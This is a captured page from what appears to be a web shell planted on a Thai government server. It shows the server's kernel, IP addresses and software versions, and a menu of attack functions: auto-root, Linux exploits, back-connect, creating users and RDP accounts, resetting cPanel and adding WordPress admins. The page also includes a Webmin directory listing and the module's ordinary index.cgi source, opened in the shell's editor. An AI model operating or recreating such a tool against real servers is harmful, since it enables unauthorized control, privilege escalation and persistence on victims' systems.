Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
cluster-webmin /
[ HOME SHELL ]
Name
Size
Permission
Action
help
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
1.05
KB
-rw-r--r--
add.cgi
2.48
KB
-rwxr-xr-x
cluster-webmin-lib.pl
7.29
KB
-rwxr-xr-x
config
25
B
-rw-r--r--
config.info
108
B
-rw-r--r--
config.info.ca
135
B
-rw-r--r--
config.info.ca.UTF-8
137
B
-rw-r--r--
config.info.cz
71
B
-rw-r--r--
config.info.cz.UTF-8
79
B
-rw-r--r--
config.info.de
129
B
-rw-r--r--
config.info.de.UTF-8
129
B
-rw-r--r--
config.info.es
87
B
-rw-r--r--
config.info.es.UTF-8
87
B
-rw-r--r--
config.info.fr
75
B
-rw-r--r--
config.info.fr.UTF-8
77
B
-rw-r--r--
config.info.hr
0
B
-rw-r--r--
config.info.hu
0
B
-rw-r--r--
config.info.ms_MY
131
B
-rw-r--r--
config.info.ms_MY.UTF-8
131
B
-rw-r--r--
config.info.nl
131
B
-rw-r--r--
config.info.nl.UTF-8
131
B
-rw-r--r--
config.info.no
131
B
-rw-r--r--
config.info.no.UTF-8
131
B
-rw-r--r--
config.info.pl
119
B
-rw-r--r--
config.info.pl.UTF-8
122
B
-rw-r--r--
create_group.cgi
3.11
KB
-rwxr-xr-x
create_user.cgi
3.95
KB
-rwxr-xr-x
delete_group.cgi
3.22
KB
-rwxr-xr-x
delete_host.cgi
248
B
-rwxr-xr-x
delete_mod.cgi
4.17
KB
-rwxr-xr-x
delete_user.cgi
2.15
KB
-rwxr-xr-x
edit_acl.cgi
3.94
KB
-rwxr-xr-x
edit_config.cgi
2.13
KB
-rwxr-xr-x
edit_group.cgi
6.35
KB
-rwxr-xr-x
edit_host.cgi
4.46
KB
-rwxr-xr-x
edit_mod.cgi
7
KB
-rwxr-xr-x
edit_user.cgi
8.96
KB
-rwxr-xr-x
group_form.cgi
2.98
KB
-rwxr-xr-x
index.cgi
9.46
KB
-rwxr-xr-x
install.cgi
7.67
KB
-rwxr-xr-x
module.info
227
B
-rw-r--r--
module.info.ca
171
B
-rw-r--r--
module.info.ca.UTF-8
190
B
-rw-r--r--
module.info.cz
33
B
-rw-r--r--
module.info.cz.UTF-8
39
B
-rw-r--r--
module.info.de
160
B
-rw-r--r--
module.info.de.UTF-8
172
B
-rw-r--r--
module.info.es
36
B
-rw-r--r--
module.info.es.UTF-8
42
B
-rw-r--r--
module.info.fr
35
B
-rw-r--r--
module.info.fr.UTF-8
41
B
-rw-r--r--
module.info.hu
33
B
-rw-r--r--
module.info.hu.UTF-8
39
B
-rw-r--r--
module.info.ms_MY
157
B
-rw-r--r--
module.info.ms_MY.UTF-8
169
B
-rw-r--r--
module.info.nl
33
B
-rw-r--r--
module.info.nl.UTF-8
39
B
-rw-r--r--
module.info.no
32
B
-rw-r--r--
module.info.no.UTF-8
38
B
-rw-r--r--
module.info.pl
163
B
-rw-r--r--
module.info.pl.UTF-8
180
B
-rw-r--r--
refresh.cgi
4.08
KB
-rwxr-xr-x
save_acl.cgi
3.33
KB
-rwxr-xr-x
save_config.cgi
1.33
KB
-rwxr-xr-x
save_group.cgi
4.54
KB
-rwxr-xr-x
save_user.cgi
5.24
KB
-rwxr-xr-x
sync.cgi
4
KB
-rwxr-xr-x
sync_form.cgi
1.8
KB
-rwxr-xr-x
update.cgi
4.1
KB
-rwxr-xr-x
upgrade.cgi
15.25
KB
-rwxr-xr-x
user_form.cgi
4.52
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.cgi
#!/usr/bin/perl # index.cgi # Display hosts on which webmin modules are being managed, a list of # installed modules and a form for installing new ones require './cluster-webmin-lib.pl'; &ui_print_header(undef, $text{'index_title'}, "", "intro", 1, 1); # Display hosts on which modules will be installed print &ui_subheading($text{'index_hosts'}); @servers = &list_servers(); @hosts = &list_webmin_hosts(); if ($config{'sort_mode'} == 1) { @hosts = sort { my ($as) = grep { $_->{'id'} == $a->{'id'} } @servers; my ($bs) = grep { $_->{'id'} == $b->{'id'} } @servers; lc($as->{'host'}) cmp lc($bs->{'host'}) } @hosts; } elsif ($config{'sort_mode'} == 2) { @hosts = sort { my ($as) = grep { $_->{'id'} == $a->{'id'} } @servers; my ($bs) = grep { $_->{'id'} == $b->{'id'} } @servers; lc(&server_name($as)) cmp lc(&server_name($bs)) }@hosts; } $formno = 0; foreach $h (@hosts) { local ($s) = grep { $_->{'id'} == $h->{'id'} } @servers; next if (!$s); push(@titles, &server_name($s)."<br>". &text('index_version', $h->{'version'})); push(@links, "edit_host.cgi?id=$h->{'id'}"); push(@icons, "$gconfig{'webprefix'}/servers/images/$s->{'type'}.gif"); $gothost{$h->{'id'}}++; } if (@links) { if ($config{'table_mode'}) { # Show as table print &ui_columns_start([ $text{'index_thost'}, $text{'index_tdesc'}, $text{'index_tver'}, $text{'index_ttype'} ]); foreach $h (@hosts) { local ($s) = grep { $_->{'id'} == $h->{'id'} } @servers; next if (!$s); local ($type) = grep { $_->[0] eq $s->{'type'} } @servers::server_types; print &ui_columns_row([ &ui_link("edit_host.cgi?id=$h->{'id'}",($s->{'host'} || &get_system_hostname())), $s->{'desc'}, $h->{'version'}, $type->[1], ]); } print &ui_columns_end(); } else { # Show as icons &icons_table(\@links, \@titles, \@icons); } } else { # Nothing to show print "<b>$text{'index_nohosts'}</b><p>\n"; } # Build common selectors @wgroups = &all_groups(\@hosts); $modsel2 = $modsel = "<select name=mod>\n"; $modsel2 .= "<option value=''>$text{'index_gacl'}</option>\n"; foreach $m (&all_modules(\@hosts)) { $modsel .= "<option value=$m->{'dir'}>$m->{'desc'}</option>\n"; $modsel2 .= "<option value=$m->{'dir'}>$m->{'desc'}</option>\n"; } $modsel .= "</select>\n"; $modsel2 .= "</select>\n"; $themesel = "<select name=theme>\n"; foreach $t (&all_themes(\@hosts)) { $themesel .= "<option value=$t->{'dir'}>$t->{'desc'}</option>\n"; } $themesel .= "</select>\n"; $usersel = "<select name=user>\n"; foreach $u (&all_users(\@hosts)) { $usersel .= "<option>$u->{'name'}</option>\n"; } $usersel .= "</select>\n"; $groupsel = "<select name=group>\n"; foreach $u (@wgroups) { $groupsel .= "<option>$u->{'name'}</option>\n"; } $groupsel .= "</select>\n"; print "<table data-post-icon-row-submit width=100%><tr>\n"; @addservers = grep { !$gothost{$_->{'id'}} } @servers; if (@addservers) { print "<td><form action=add.cgi>\n"; print "<input type=submit name=add value='$text{'index_add'}'>\n"; print "<select name=server>\n"; foreach $s (sort { $a->{'host'} cmp $b->{'host'} } @addservers) { print "<option value=$s->{'id'}>",&server_name($s),"</option>\n"; } print "</select>\n"; print "</form></td>\n"; $formno++; } else { print "<td></td>\n"; } @groups = &servers::list_all_groups(\@servers); if (@groups) { print "<td align=right><form action=add.cgi>\n"; print "<input type=submit name=gadd value='$text{'index_gadd'}'>\n"; print "<select name=group>\n"; foreach $g (@groups) { print "<option>$g->{'name'}</option>\n"; } print "</select>\n"; print "</form></td>\n"; $formno++; } else { print "<td></td>\n"; } print "</tr></table>\n"; if (@hosts) { # Display user search forms and new user buttons print &ui_hr(); print &ui_subheading($text{'index_users'}); print "<table width=100%>\n"; print "<tr><td><form action=edit_user.cgi>\n"; print "<input type=submit value='$text{'index_euser'}'>\n"; print $usersel; print "</form></td>\n"; $formno++; print "<td><form action=edit_acl.cgi>\n"; print "<input type=submit value='$text{'index_euseracl'}'>\n"; print $usersel; print "$text{'index_inmod'}\n"; print $modsel2; print "</form></td>\n"; $formno++; print "<td align=right><form action=user_form.cgi>\n"; print "<input type=submit value='$text{'index_cuser'}'>\n"; print "</form></td></tr>\n"; $formno++; if (@wgroups) { print "<tr><td><form action=edit_group.cgi>\n"; print "<input type=submit value='$text{'index_egroup'}'>\n"; print $groupsel; print "</form></td>\n"; $formno++; print "<td><form action=edit_acl.cgi>\n"; print "<input type=submit value='$text{'index_egroupacl'}'>\n"; print $groupsel; print "$text{'index_inmod'}\n"; print $modsel2; print "</form></td>\n"; $formno++; } else { print "<tr> <td colspan=2></td>\n"; } print "<td align=right><form action=group_form.cgi>\n"; print "<input type=submit value='$text{'index_cgroup'}'>\n"; print "</form></td></tr>\n"; $formno++; print "<tr> <td align=left colspan=2><form action=refresh.cgi>\n"; print "<input type=submit value='$text{'index_refresh'}'>\n"; &create_on_input(undef, 1, 1); print "</form></td>\n"; $formno++; print "<td align=right><form action=sync_form.cgi>\n"; print "<input type=submit value='$text{'index_sync'}'>\n"; print "</form></td></tr>\n"; $formno++; print "</table>\n"; # Display modules lists and new module form print &ui_hr(); print &ui_subheading($text{'index_modules'}); print "<table width=100%><tr>\n"; print "<td><form action=edit_mod.cgi>\n"; print "<input type=submit value=\"$text{'index_edit'}\">\n"; print $modsel; print "</form></td>\n"; print "<td align=right><form action=edit_mod.cgi>\n"; print "<input type=submit name=tedit value=\"$text{'index_tedit'}\">\n"; print $themesel; print "</form></td>\n"; print "</tr></table><p>\n"; $formno++; print "<form action=install.cgi method=post ", "enctype=multipart/form-data>\n"; print "$text{'index_installmsg'}<p>\n"; print "<input type=radio name=source value=0 checked> $text{'index_local'}\n"; print "<input name=local size=50>\n"; print &file_chooser_button("local", 0, $formno); print "<br>\n"; print "<input type=radio name=source value=1> $text{'index_uploaded'}\n"; print "<input type=file name=upload size=20><br>\n"; print "<input type=radio name=source value=2> $text{'index_ftp'}\n"; print "<input name=url size=50><br>\n"; print " " x 5,"<input type=checkbox name=down value=1> ", "$text{'index_down'}<p>\n"; print "<input type=radio name=grant value=0 checked> ", "$text{'index_grant2'}\n"; print "<input name=grantto size=30 value='$base_remote_user'><br>\n"; print "<input type=radio name=grant value=1> ", "$text{'index_grant1'}<br>\n"; print "<input type=checkbox name=nodeps value=1> ", "$text{'index_nodeps'}<p>\n"; print "$text{'index_installon'}\n"; &create_on_input(); print "<p>\n"; print "<input type=submit value=\"$text{'index_installok'}\">\n"; print "</form>\n"; $formno++; # Display upgrade form &foreign_require("webmin", "webmin-lib.pl"); print &ui_hr(); print &ui_subheading($text{'index_upgrade'}); print "$text{'index_updesc'}<p>\n"; # what kind of install is the local system? $mode = &webmin::get_install_type(); print "<form action=upgrade.cgi method=post enctype=multipart/form-data>\n"; print "<input type=hidden name=mode value='$mode'>\n"; print "<input type=radio name=source value=0> $text{'index_local'}\n"; print "<input name=file size=40>\n"; print &file_chooser_button("file", 0, $formno),"<br>\n"; print "<input type=radio name=source value=1> $text{'index_uploaded'}\n"; print "<input name=upload type=file size=30><br>\n"; print "<input type=radio name=source value=5> $text{'index_ftp'}\n"; print "<input name=url size=40><br>\n"; if ($in{'mode'} eq 'rpm' || $mode eq 'deb' || !$in{'mode'}) { print "<input type=radio name=source value=2 checked> $webmin::text{'upgrade_ftp'}<br>\n"; } print "<p>\n"; printf "<input type=checkbox name=sig value=1> %s<br>\n", $webmin::text{'upgrade_sig'}; print "<input type=checkbox name=delete value=1> ", "$webmin::text{'upgrade_delete'}<br>\n"; print "<input type=checkbox name=only value=1> ", "$webmin::text{'upgrade_only'}<br>\n"; print "$text{'index_upgradeon'}\n"; &create_on_input(); print "<input type=submit value=\"$webmin::text{'upgrade_ok'}\">\n"; print "</form>\n"; $formno++; # Show form for installing updates print &ui_hr(); print &ui_subheading($text{'index_update'}); print "$text{'index_updatedesc'}<p>\n"; print "<form action=update.cgi>\n"; printf "<input type=radio name=source value=0 %s> %s<br>\n", $webmin::config{'upsource'} ? "" : "checked", $webmin::text{'update_webmin'}; printf "<input type=radio name=source value=1 %s> %s\n", $webmin::config{'upsource'} ? "checked" : "", $webmin::text{'update_other'}; printf "<input name=other size=30 value='%s'><p>\n", $webmin::config{'upsource'}; printf "<input type=checkbox name=show value=1 %s> %s<br>\n", $webmin::config{'upshow'} ? "checked" : "", $webmin::text{'update_show'}; printf "<input type=checkbox name=missing value=1 %s> %s<br>\n", $webmin::config{'upmissing'} ? "checked" : "", $webmin::text{'update_missing'}; printf "<input type=checkbox name=third value=1 %s> %s<br>\n", $webmin::config{'upthird'} ? "checked" : "", $webmin::text{'update_third'}; print "$text{'index_updateon'}\n"; &create_on_input(undef, 1); print "<input type=submit value=\"$webmin::text{'update_ok'}\">\n"; print "</form>\n"; } &ui_print_footer("/", $text{'index'});
Close